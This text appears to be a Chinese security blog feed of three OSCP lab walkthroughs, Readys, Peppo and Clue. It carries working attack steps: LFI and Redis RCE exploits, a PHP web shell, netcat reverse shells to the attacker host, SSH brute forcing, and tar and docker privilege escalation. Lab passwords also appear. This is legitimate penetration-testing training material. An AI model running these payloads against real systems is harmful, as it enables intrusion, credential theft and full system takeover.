渗透测试 on 静静的安全笔记

OSCP官方靶场 Readys WP

Wed, 15 Oct 2025 16:58:28 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.182
3# 靶机地址
4192.168.147.166

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.166 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
 9sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
10# 扫描目录
11gobuster dir -e -u http://192.168.147.166 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.147.166/
13wpscan --update --url http://192.168.147.166/ --enumerate ap,t,u --api-token XXX

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Readys]
 2└─$ echo $ports
 322,80,6379
 4
 5┌──(kali㉿kali)-[~/Desktop/Readys]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:12 EDT
 8Nmap scan report for 192.168.147.166
 9Host is up (0.12s latency).
10
11PORT STATE SERVICE VERSION
1222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
13| ssh-hostkey:
14| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
15| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
16|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
1780/tcp open http Apache httpd 2.4.38 ((Debian))
18|_http-title: Readys &#8211; Just another WordPress site
19|_http-generator: WordPress 5.7.2
20|_http-server-header: Apache/2.4.38 (Debian)
216379/tcp open redis Redis key-value store
22Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
23Device type: general purpose|router
24Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
25OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
26OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
27Network Distance: 4 hops
28Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
29
30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
31Nmap done: 1 IP address (1 host up) scanned in 42.97 seconds
32
33┌──(kali㉿kali)-[~/Desktop/Readys]
34└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
35Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:18 EDT
36Nmap scan report for 192.168.147.166
37Host is up (0.12s latency).
38
39PORT STATE SERVICE
4022/tcp open ssh
4180/tcp open http
42| http-csrf:
43| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.147.166
44| Found the following possible CSRF vulnerabilities:
45|
46| Path: http://192.168.147.166:80/
47| Form id: search-form-1
48| Form action: http://192.168.147.166/
49|
50| Path: http://192.168.147.166:80/index.php/category/uncategorised/
51| Form id: search-form-1
52| Form action: http://192.168.147.166/
53|
54| Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com&quot;&gt;Gravatar&lt;/a&gt;.]]
55| Form id: search-form-2
56| Form action: http://192.168.147.166/
57|
58| Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com&quot;&gt;Gravatar&lt;/a&gt;.]]
59| Form id: search-form-1
60|_ Form action: http://192.168.147.166/
61|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
62|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
63| http-fileupload-exploiter:
64|
65| Couldn't find a file-type field.
66|
67|_ Couldn't find a file-type field.
68|_http-dombased-xss: Couldn't find any DOM based XSS.
69| http-wordpress-users:
70| Username found: admin
71|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
72| http-enum:
73| /wp-login.php: Possible admin folder
74| /readme.html: Wordpress version: 2
75| /: WordPress version: 5.7.2
76| /wp-includes/images/rss.png: Wordpress version 2.2 found.
77| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
78| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
79| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
80| /wp-login.php: Wordpress login page.
81| /wp-admin/upgrade.php: Wordpress login page.
82|_ /readme.html: Interesting, a readme.
836379/tcp open redis
84
85Nmap done: 1 IP address (1 host up) scanned in 118.67 seconds
86
87
88┌──(kali㉿kali)-[~/Desktop/Readys]
89└─$ whatweb http://192.168.147.166/
90http://192.168.147.166/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.147.166], JQuery[3.5.1], MetaGenerator[WordPress 5.7.2], PoweredBy[--], Script[text/javascript], Title[Readys &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[5.7.2]
91
92===============================================================
93Starting gobuster in directory enumeration mode
94===============================================================
95/wp-contentwp-content (Status: 301) [Size: 323] [--> http://192.168.147.166/wp-content/]
96/wp-includeswp-includes (Status: 301) [Size: 324] [--> http://192.168.147.166/wp-includes/]
97/wp-adminwp-admin (Status: 301) [Size: 321] [--> http://192.168.147.166/wp-admin/]

发现存在用户名admin，但是密码爆不出来。

site-editor插件漏洞

1 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
2 | References:
3 | - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
4 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
5 | - https://seclists.org/fulldisclosure/2018/Mar/40
6 | - https://github.com/SiteEditor/editor/issues/2

利用成功，发现有一个叫alice的用户，按照靶机的设置习惯，alice用户下面应该有一个flag，flag的文件名一般是local.txt，而root下面还有一个叫proof.txt的文件想直接看ssh密钥的，复制下来直接登录，但是ssh密钥看不了，只能看一下redis的配置

1/root/.ssh/id_rsa
2/home/alice/.ssh/id_rsa
3/etc/redis/redis.conf
4cat 166redis.conf |grep "requirepass"

得到redis的认证密码是Ready4Redis

1 redis-cli -h 192.168.147.166 -a 'Ready4Redis?'
2 info server

Redis-RCE 漏洞反弹shell

1git clone https://hk.gh-proxy.com/https://github.com/n0b0dyCN/redis-rogue-server.git
2git clone https://hk.gh-proxy.com/https://github.com/Ridter/redis-rce.git
3cd redis-rce
4cp ../redis-rogue-server/exp.so .
5# 新开一个终端等待反弹
6rlwrap -cAr nc -nlvp 80
7# 执行RCE脚本
8python redis-rce.py -r 192.168.147.166 -L 192.168.45.182 -P 6379 -f exp.so -a 'Ready4Redis?'
9python3 -c 'import pty;pty.spawn("/bin/bash")'

找到数据库配置

💡 数据库密码

karl Wordpress1234

文件权限php一句话木马

但是目前的redis账户还是不能直接登录，要找一个正经的用户。查找可以写的目录，然后把php一句话木马写上去。在各个⽬录尝试写⼊ echo "<?php phpinfo() ?>" > test.php ，/run/redis⽬录写⼊之后在使⽤LFI之后php会被解析，尝试写⼊⼀个⼀句话⽊⻢ echo '<?php system($_GET["cmd"]); ?>' > test.php

1find / -type d -maxdepth 5 -writable 2>/dev/null

1# kali 新建一个监听终端
2rlwrap -cAr nc -nlvp 443
3# 访问LFI地址
4http://192.168.147.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php&cmd=busybox%20nc%20192.168.45.182%20443%20-e%20sh
5busybox nc 192.168.45.182 443 -e sh
6# 美化终端
7python3 -c 'import pty;pty.spawn("/bin/bash")'

连上数据库得到WP的管理员密码，但是这个密码对我们之后的提权没有用了已经。

admin | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0

上传小豌豆查一下提权的点

查看/usr/local/bin/backup.sh文件的内容，发现可以用tar提权。详见[[OSCP官方靶场-Amaterasu WP#Tar提权详解]]-CNSD

tar提权

 1cd /var/www/html
 2echo "" > '--checkpoint=1' 
 3echo "" > '--checkpoint-action=exec=sh payload.sh' 
 4
 5# kali
 6echo "echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers" >payload.sh
 7chmod +x payload.sh
 8python3 -m http.server
 9
10# 靶机
11wget 192.168.45.182:8080/payload.sh
12sudo -l 
13sudo /bin/bash

提权成功，拿到flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.182]
 B[靶机 
 192.168.147.166]
 C[WP插件site-editor 文件读取漏洞]
 D[Redis-RCE漏洞]
 E[文件读取漏洞综合利用提升为Alice]
 F[Tar提权root]
 

 %% 路径关系
 A-->|扫描|B
 B-->C
 C-->D
 D-->E
 E-->F

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C,D public;
 class E,F internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-10-15 17:05, 2025-10-15 17:51
 漏洞识别 :a2, after a1, 15m
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-10-15 19:05
 权限提升 :crit,b2, after b1, 35m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Peppo WP

Wed, 15 Oct 2025 15:08:22 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.182
3# 靶机地址
4192.168.147.60

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.60 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
 9sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
10# 扫描目录
11sudo gobuster dir -u http://192.168.147.60:8080 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25
12 sudo gobuster dir -u http://192.168.147.60:10000 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25 --exclude-length 12
13whatweb http://192.168.147.60:8080/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,53,113,5432,8080
 4
 5┌──(kali㉿kali)-[~]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:13 EDT
 8Nmap scan report for 192.168.147.60
 9Host is up (0.12s latency).
 10
 11PORT STATE SERVICE VERSION
 1222/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
 13|_auth-owners: root
 14| ssh-hostkey:
 15| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
 16| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
 17|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
 1853/tcp closed domain
 19113/tcp open ident FreeBSD identd
 20|_auth-owners: nobody
 215432/tcp open postgresql PostgreSQL DB 9.6.0 or later
 228080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
 23|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
 24| http-robots.txt: 4 disallowed entries
 25|_/issues/gantt /issues/calendar /activity /search
 26|_http-title: Redmine
 27Aggressive OS guesses: Linux 3.10 - 4.11 (96%), Linux 3.13 - 4.4 (96%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.13 (93%), Linux 3.8 - 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.13 or 4.2 (90%), Linux 4.4 (90%), Linux 2.6.32 - 3.10 (90%), Linux 5.0 - 5.14 (90%)
 28No exact OS matches for host (test conditions non-ideal).
 29Service Info: OSs: Linux, FreeBSD; CPE: cpe:/o:linux:linux_kernel, cpe:/o:freebsd:freebsd
 30
 31OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 32Nmap done: 1 IP address (1 host up) scanned in 32.27 seconds
 33
 34┌──(kali㉿kali)-[~]
 35└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
 36Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:27 EDT
 37Nmap scan report for 192.168.147.60
 38Host is up (0.12s latency).
 39
 40PORT STATE SERVICE
 4122/tcp open ssh
 4253/tcp closed domain
 43113/tcp open ident
 445432/tcp open postgresql
 458080/tcp open http-proxy
 46| http-slowloris-check:
 47| VULNERABLE:
 48| Slowloris DOS attack
 49| State: LIKELY VULNERABLE
 50| IDs: CVE:CVE-2007-6750
 51| Slowloris tries to keep many connections to the target web server open and hold
 52| them open as long as possible. It accomplishes this by opening connections to
 53| the target web server and sending a partial request. By doing so, it starves
 54| the http server''s resources causing Denial Of Service.
 55|
 56| Disclosure date: 2009-09-17
 57| References:
 58| http://ha.ckers.org/slowloris/
 59|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
 60| http-enum:
 61| /login.stm: Belkin G Wireless Router
 62| /admin.php: Possible admin folder (401 Unauthorized )
 63| /login.php: Possible admin folder
 64| /login.html: Possible admin folder
 65| /admin.cfm: Possible admin folder (401 Unauthorized )
 66| /login.cfm: Possible admin folder
 67| /admin.asp: Possible admin folder (401 Unauthorized )
 68| /login.asp: Possible admin folder
 69| /admin.aspx: Possible admin folder (401 Unauthorized )
 70| /login.aspx: Possible admin folder
 71| /admin.jsp: Possible admin folder (401 Unauthorized )
 72| /login.jsp: Possible admin folder
 73| /users.sql: Possible database backup (401 Unauthorized )
 74| /login/: Login page
 75| /login.htm: Login page
 76| /login.jsp: Login page
 77| /robots.txt: Robots file
 78| /admin.nsf: Lotus Domino (401 Unauthorized )
 79| /news/: Potentially interesting folder
 80|_ /search/: Potentially interesting folder
 81
 82Nmap done: 1 IP address (1 host up) scanned in 413.78 seconds
 83
 84┌──(kali㉿kali)-[~]
 85└─$ whatweb http://192.168.147.60:8080
 86http://192.168.147.60:8080 [200 OK] ChiliProject, Cookies[_redmine_session], Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)], HttpOnly[_redmine_session], IP[192.168.147.60], JQuery, Redmine, Ruby[2.6.6,WEBrick/1.4.2], Script, Title[Redmine], UncommonHeaders[x-content-type-options,x-download-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block]
 87
 88===============================================================
 89Starting gobuster in directory enumeration mode
 90===============================================================
 91/newsnews (Status: 200) [Size: 5361]
 92/searchsearch (Status: 200) [Size: 7933]
 93/loginlogin (Status: 200) [Size: 5011]
 94/projectsprojects (Status: 200) [Size: 12258]
 95/usersusers (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fusers]
 96/adminadmin (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fadmin]
 97/issuesissues (Status: 200) [Size: 19698]
 98/groupsgroups (Status: 302) [Size: 151] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fgroups]
 99/mymy (Status: 302) [Size: 147] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fmy]
100/logoutlogout (Status: 302) [Size: 93] [--> http://192.168.147.60:8080/]
101/404404 (Status: 200) [Size: 459]
102/settingssettings (Status: 302) [Size: 153] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fsettings]
103/activityactivity (Status: 200) [Size: 7312]
104/500500 (Status: 200) [Size: 648]
105Progress: 24077 / 220559 (10.92%)^C

没有发现什么

SSH密码爆破

1sudo apt install ident-user-enum
2ident-user-enum 192.168.147.60 22 113 8080 10000
3hydra -L users.txt -P users.txt ssh://192.168.147.60

Ident-user-enum 用这个软件来爆破各个端口可能存在的用户名，然后使⽤⽤⼾名=密码的形式试一下。得到ssh的登录名和密码

💡 ssh密码

eleanor

登录后发现终端受限，是只读终端，能执行的命令有限，所以做逃逸

rbash逃逸

参考 https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

1echo $PATH # 查看路径变量
2ed
3!/bin/bash
4export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

得到第一个flag

提权

查看etc/paawd的时候发现提示有一封邮件算是触发了一种管理员警告的邮件？我刚刚想要sudo -l 提权的时候发现没有权限。发现用户是在docker组中，docker提权一下

1docker images
2docker run -v /:/mnt --rm -it redmine chroot /mnt bash
3cat root/proof.txt

得到第二个flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.182]
 B[靶机 
 192.168.147.60]
 C[SSH 密码爆破]
 D[rbash 逃逸]
 E[Docker 逃逸]

 
 %% 路径关系
 A-->|扫描|B
 B-->C
 C-->D
 D-->E


	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B public;
 class C,D,E internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-10-15 15:13, 2025-10-15 15:40
 漏洞识别 :a2, after a1, 15m
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-10-15 16:40
 权限提升 :crit,b2, after b1, 5m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

补充知识点-Docker提权

这个命令让你获得 root 权限的原因在于 Docker 的特权操作和文件系统挂载的结合使用。以下是详细解释：

🔧 命令分解：

docker run -v /:/mnt --rm -it redmine chroot /mnt bash

docker run
- 启动一个新容器
-v /:/mnt
- 关键操作：将宿主机的整个根文件系统 (/) 挂载到容器的 /mnt目录
- 这意味着容器可以直接访问宿主机的所有文件
--rm
- 容器退出后自动删除
-it
- 分配交互式终端
redmine
- 使用的镜像（这里可以是任意镜像）
chroot /mnt bash
- 核心逃逸：在容器内执行 chroot命令
- 将根目录切换到宿主机的文件系统 (/mnt)
- 然后启动 bashshell

🚀 为什么能获得 root 权限：

Docker 组的特权
- 你的用户属于 docker组（groups=...999(docker)）
- Docker 组成员可以运行容器，默认以 root 身份执行容器内命令
文件系统挂载
- -v /:/mnt使容器能访问宿主机的完整文件系统
chroot 切换
- chroot /mnt将工作环境切换到宿主机的文件系统
- 此时你在容器内执行的命令，实际是在操作宿主机
权限继承
- 容器内的 root 用户映射到宿主机的 root 用户
- 当你在 chroot 环境中执行命令时，拥有宿主机的 root 权限

⚠️ 安全风险：

这种操作极其危险，因为：

完全绕过系统权限控制
可以任意修改系统文件
能访问所有用户数据
相当于直接获得宿主机 root 权限

🔒 系统管理员应该：

限制 docker 组权限：

sudo usermod -G eleanor -a # 从docker组移除用户

启用用户命名空间隔离：

# /etc/docker/daemon.json
{
 "userns-remap": "default"
}

限制危险挂载：

docker run --cap-drop=ALL --security-opt no-new-privileges ...

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Clue WP

Fri, 22 Aug 2025 15:37:55 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.187
3# 靶机地址
4192.168.133.240

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.133.240 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.133.240
 9sudo nmap --script=vuln -p$ports -Pn 192.168.133.240
10# 扫描框架
11whatweb http://192.168.133.240:3000/
12# 扫描目录
13gobuster dir -e -u http://192.168.133.240:3000 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e -t 25 --exclude-length 3837

直接扫目录会因为长度报错，修改了一下命令

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,80,139,445,3000
 4
 5┌──(kali㉿kali)-[~]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.133.240
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 03:47 EDT
 8Nmap scan report for 192.168.133.240
 9Host is up (0.20s latency).
10
11PORT STATE SERVICE VERSION
1222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
13| ssh-hostkey:
14| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
15| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
16|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
1780/tcp open http Apache httpd 2.4.38
18|_http-title: 403 Forbidden
19|_http-server-header: Apache/2.4.38 (Debian)
20139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
21445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
223000/tcp open http Thin httpd
23|_http-title: Cassandra Web
24|_http-server-header: thin
25|_http-trane-info: Problem with XML parsing of /evox/about
26Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
27Device type: general purpose|router
28Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (97%)
29OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0
30Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%)
31No exact OS matches for host (test conditions non-ideal).
32Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
33
34Host script results:
35| smb-security-mode:
36| account_used: guest
37| authentication_level: user
38| challenge_response: supported
39|_ message_signing: disabled (dangerous, but default)
40| smb-os-discovery:
41| OS: Windows 6.1 (Samba 4.9.5-Debian)
42| Computer name: clue
43| NetBIOS computer name: CLUE\x00
44| Domain name: pg
45| FQDN: clue.pg
46|_ System time: 2025-08-22T03:47:55-04:00
47| smb2-security-mode:
48| 3:1:1:
49|_ Message signing enabled but not required
50| smb2-time:
51| date: 2025-08-22T07:47:54
52|_ start_date: N/A
53|_clock-skew: mean: 1h20m03s, deviation: 2h18m40s, median: 0s
54
55OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
56Nmap done: 1 IP address (1 host up) scanned in 84.87 seconds
57
58┌──(kali㉿kali)-[~]
59└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.133.240
60Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 03:50 EDT
61Nmap scan report for 192.168.133.240
62Host is up (0.27s latency).
63
64PORT STATE SERVICE
6522/tcp open ssh
6680/tcp open http
67|_http-csrf: Couldn't find any CSRF vulnerabilities.'
68|_http-dombased-xss: Couldn't find any DOM based XSS.
69|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
70139/tcp open netbios-ssn
71445/tcp open microsoft-ds
723000/tcp open ppp
73
74Host script results:
75| smb-vuln-regsvc-dos:
76| VULNERABLE:
77| Service regsvc in Microsoft Windows systems vulnerable to denial of service
78| State: VULNERABLE
79| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
80| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
81| while working on smb-enum-sessions.
82|_
83|_smb-vuln-ms10-061: false
84|_smb-vuln-ms10-054: false
85
86Nmap done: 1 IP address (1 host up) scanned in 119.91 seconds
87
88┌──(kali㉿kali)-[~]
89└─$ whatweb http://192.168.133.240:3000/
90http://192.168.133.240:3000/ [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[thin], IP[192.168.133.240], Script, Title[Cassandra Web], X-UA-Compatible[IE=edge]

Cassandra 远程文件读取漏洞

这里Nmap的扫描结果提示了打开80端口提示forbiden，打开3000端口是一个数据库管理的界面Cassandra Web。然后139和445端口是smb协议的端口，还扫出来了一些基本信息，smb协议有很多漏洞，但是这个扫描的结果也提示了 smb-vuln-ms10-061 和 smb-vuln-ms10-054这两个最好用的漏洞不存在。扫描3000端口的目录没有发现有用的信息。

搜索3000端口对应的框架是否有漏洞，发现一个远程文件读取漏洞。

1searchsploit Cassandra
2searchsploit -m linux/webapps/49362.py

1python 49362.py 192.168.133.240 /etc/passwd
2python 49362.py 192.168.133.240 /proc/self/cmdline
3python 49362.py 192.168.133.240 /etc/ssh/sshd_config

用户密码

cassie SecondBiteTheApple330

但是ssh登录失败，也不是另一个用户的密码，还要继续搜索其他的配置文件。

freeswitch命令执行漏洞

官方完整的扫描中是存在8021端口的，这里是扫描漏掉了，所以最好还是用官方给的web kali扫描全部的端口一次，获得最全的端口。一下小节是官方给的Workthrough中的命令

 1# 让我们使用 `smbclient` 来检查一下。
 2smbclient -N -L 192.168.133.240 
 3# `backup` 分享很有趣，让我们登录看看里面有什么
 4smbclient -N //192.168.133.240/backup
 5# 目录名称
 6curl -I http://192.168.133.240/backup/freeswitch
 7curl -I http:/192.168.133.240/backup/freeswitch/etc
 8# 后面官方尝试了上传文件，但是失败，密码错误
 9mkdir backup
10sudo mount -t cifs //192.168.133.240/backup backup/ -o guest
11cd backup/
12# 挂载目录后找密码
13find . -type f -name "*.xml" -exec grep -nH password {} + | wc -l
14find . -type f -name "*.xml" -exec grep -nH password {} + | grep socket

挂上了，但是找到的是默认密码，搜索最新的配置文件会存在那个在哪里。到下面这个网站找到密码会存放在哪里的配置文件里。 https://developer.signalwire.com/freeswitch/FreeSWITCH-Explained/Configuration/Default-Configuration_6587388/#confautoload_configs 其实相对的只要把本地目录换远端目录就行，远端目录用的一定是现在在用的密码。

1python 49362.py 192.168.133.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml

端口和密码

8021 StrongClueConEight021

1searchsploit freeswitch
2searchsploit -m windows/remote/47799.txt
3mv 47799.txt 47799.py
4sed -i -E "s/ClueCon/StrongClueConEight021/g" 47799.py
5python 47799.py 192.168.133.240 whoami
6python 47799.py 192.168.133.240 ls
7python 47799.py 192.168.133.240 "ls /home"

反弹Shell

在cassie文件夹下找到一个id_rsa密钥，但是freeswitch账户没法读，现在可以执行命令的话，把shell弹回来再说。

1rlwrap -cAr nc -nlvp 3000
2python 47799.py 192.168.133.240 "nc -nv 192.168.45.187 3000 -e /bin/bash"
3python3 -c 'import pty;pty.spawn("/bin/bash")'

